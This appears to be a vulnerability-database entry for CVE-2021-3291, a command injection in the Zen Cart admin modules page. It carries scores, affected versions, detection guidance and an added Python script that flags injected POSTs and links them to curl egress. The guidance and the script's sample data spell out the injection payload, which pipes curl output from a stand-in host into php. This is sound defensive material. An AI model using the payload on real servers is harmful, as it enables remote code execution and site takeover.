CVE-2021-3291
Published 2021-01-26
Priority: P2 (score 59), high. CVSS 3.1 base score 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
Exploit: public exploit code exists (a Metasploit module is referenced under Detection & IOCs below).
EPSS: 16.78% (96.6th percentile)
Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zen-cart | zen_cart | — | — |
| zencart | zencart | >= 0 < 1.5.7c | 1.5.7c |
Detection & IOCs (extracted from sources)
- Monitor POST requests to the Zen Cart admin modules endpoint (index.php?cmd=modules&action=save) for configuration values containing injection patterns such as single quotes, backticks, or shell command sequences (e.g., `curl ... |php`). A lone single quote is a weak signal on its own; combine it with the backtick or pipe-to-php indicators to keep false positives down.
- Detect exploitation attempts by looking for the payload pattern in POST body parameters targeting Zen Cart module configuration fields: the string pattern `True','F'); echo \`curl ... |php\`; //` is the injected OS command payload.
- The Metasploit module uses a two-stage payload delivery: it starts a local HTTP server and injects a curl-pipe-php command into the Zen Cart database. Detect outbound curl requests from the web server process to attacker-controlled infrastructure following a POST to the modules save endpoint.
- Exploitation requires authenticated admin access; the vulnerability is only exploitable by an attacker who already holds valid admin credentials for the Zen Cart application.
- The MODULE and SETTING options must match an installed/active Zen Cart module (e.g., payment/freecharger); the injection only fires when the affected module configuration is subsequently loaded/edited, so the outbound callback may lag the POST rather than follow it immediately.
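The two detection ideas above (flag the injected POST, then correlate it with a web-server-originated curl/wget egress) as one runnable example. This is added code, not part of the advisory or the Metasploit module; it assumes request records are available as JSON lines with `ts`, `src`, `method`, `path` and `body` fields (from a reverse proxy or WAF that logs POST bodies) and process-level egress events as JSON lines with `ts`, `user`, `comm` and `dst`. The log records, the `198.51.100.7` callback host and the `configuration[MODULE_PAYMENT_FREECHARGER_STATUS]` field name are all constructed for illustration.

```python
"""Detection sketch for CVE-2021-3291 exploitation attempts (added example).

All log formats and field names below are assumptions, and every record is
constructed; the only page-derived facts are the endpoint query string and the
payload shape: True','F'); echo `curl ... |php`; //
"""
import json
import re
from datetime import datetime
from urllib.parse import parse_qs, unquote_plus, urlencode, urlparse

# The admin directory name differs per install, so match the query string,
# not a fixed path prefix.
def is_modules_save(path: str) -> bool:
    qs = parse_qs(urlparse(path).query)
    return qs.get("cmd") == ["modules"] and qs.get("action") == ["save"]

# Indicators of the payload shape: breaking out of the quoted config value
# (`');`), PHP backtick execution, curl piped into php, and the `; //`
# comment terminator that swallows the rest of the generated code.
INDICATORS = {
    "quote_breakout": re.compile(r"'\s*\)\s*;"),
    "backtick_exec": re.compile(r"`[^`]+`"),
    "curl_pipe_php": re.compile(r"curl\b.*\|\s*php", re.I),
    "comment_terminator": re.compile(r";\s*//"),
}

def scan_body(body: str) -> list:
    """Return the indicator names that fire on a URL-decoded POST body."""
    decoded = unquote_plus(body)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def find_injection_posts(lines) -> list:
    """Findings for POSTs to the modules save endpoint carrying indicators."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        if rec["method"] != "POST" or not is_modules_save(rec["path"]):
            continue
        hits = scan_body(rec.get("body", ""))
        if hits:
            findings.append({"ts": rec["ts"], "src": rec["src"], "indicators": hits})
    return findings

WEB_SERVER_USERS = {"www-data", "apache", "nginx", "http"}  # assumed account names
DOWNLOADERS = {"curl", "wget"}

def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

def correlate_egress(findings, egress_lines, window_seconds=3600) -> list:
    """Attach web-server-originated curl/wget egress seen within the window after
    each injected POST. The window is generous because the payload only fires
    when the module configuration is next loaded, not at save time."""
    events = [json.loads(line) for line in egress_lines]
    out = []
    for f in findings:
        t0 = _ts(f["ts"])
        matched = [e for e in events
                   if e["user"] in WEB_SERVER_USERS and e["comm"] in DOWNLOADERS
                   and 0 <= (_ts(e["ts"]) - t0).total_seconds() <= window_seconds]
        if matched:
            out.append({**f, "egress": matched})
    return out

# Constructed sample data (not real traffic).
FIELD = "configuration[MODULE_PAYMENT_FREECHARGER_STATUS]"  # hypothetical field name
PAYLOAD = "True','F'); echo `curl http://198.51.100.7:8080/s |php`; //"
REQUEST_LOG = [json.dumps(r) for r in [
    {"ts": "2021-02-01T09:58:00Z", "src": "203.0.113.5", "method": "GET",
     "path": "/admin/index.php?cmd=modules&set=payment", "body": ""},
    {"ts": "2021-02-01T09:59:00Z", "src": "203.0.113.5", "method": "POST",
     "path": "/admin/index.php?cmd=modules&action=save&set=payment",
     "body": urlencode({FIELD: "True", FIELD.replace("STATUS", "SORT_ORDER"): "0"})},
    {"ts": "2021-02-01T10:00:00Z", "src": "203.0.113.5", "method": "POST",
     "path": "/admin/index.php?cmd=modules&action=save&set=payment",
     "body": urlencode({FIELD: PAYLOAD})},
]]
EGRESS_LOG = [json.dumps(e) for e in [
    {"ts": "2021-02-01T09:00:00Z", "user": "root", "comm": "apt", "dst": "198.51.100.200:80"},
    {"ts": "2021-02-01T10:00:05Z", "user": "www-data", "comm": "curl", "dst": "198.51.100.7:8080"},
]]

if __name__ == "__main__":
    for f in correlate_egress(find_injection_posts(REQUEST_LOG), EGRESS_LOG):
        print(json.dumps(f, indent=2))
```

The correlation step is what turns a noisy content match into an actionable alert: a POST that trips the indicators but never produces an outbound fetch from the web server account is worth a look, while one that does is a confirmed second-stage download.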
CVSS provenance
- NVD, CVSS v3.1: 7.2 HIGH (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 9.0 HIGH (AV:N/AC:L/Au:S/C:C/I:C/A:C); v2 has no Critical band, so 9.0 rates as High
OSV (2022-05-24): CVE-2021-3291 [HIGH] Zen Cart vulnerable to authenticated remote code execution. Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
GHSA (2022-05-24): CVE-2021-3291 [HIGH] CWE-78 (OS command injection) Zen Cart vulnerable to authenticated remote code execution. Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
No detection rules found.
No writeups or analysis indexed.